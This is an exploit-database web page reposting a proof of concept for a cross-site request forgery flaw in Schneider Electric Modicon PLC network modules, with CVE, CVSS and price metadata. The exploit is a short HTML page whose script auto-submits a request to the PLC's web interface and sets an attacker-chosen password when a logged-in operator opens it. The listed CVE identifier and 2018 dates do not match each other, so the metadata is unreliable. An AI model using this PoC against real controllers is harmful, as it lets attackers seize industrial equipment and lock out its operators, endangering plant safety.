Advertisement






Schneider Electric/Modicon PLC - CSRF Vulnerability

CVE Category Price Severity
CVE-2020-7597 CWE-352 $5000 High
Author Risk Exploitation Type Date
Ethical Hacker High Remote 2018-05-22
CPE
cpe:cpe:/h:schneider-electric:modicon_plc
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050158

Below is a copy:

Schneider Electric/Modicon PLC - CSRF Vulnerability
# Exploit Title: Schneider Electric/Modicon PLC - CSRF Vulnerability
# Date: 2018-05-18
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: BMXNOC0401, BMXNOE0100, BMXNOE0110, BMXNOE0110H, BMXNOR0200H, BMXP342020, BMXP342020H, BMXP342030, BMXP3420302, BMXP3420302H, and BMXP342030H.
# Tested on: Windows 8 OS and Chrome Explorer
# Greetz: Jameel Nabbo
 
# PoC
 
 
<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
    <form action="http://TargetAdress/secure/embedded/builtin?Language=undefined&user=USERNAME&passwd=PASSWORD&cnfpasswd=PASSWORD&subhttppwd=Change+Password"
method="get">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum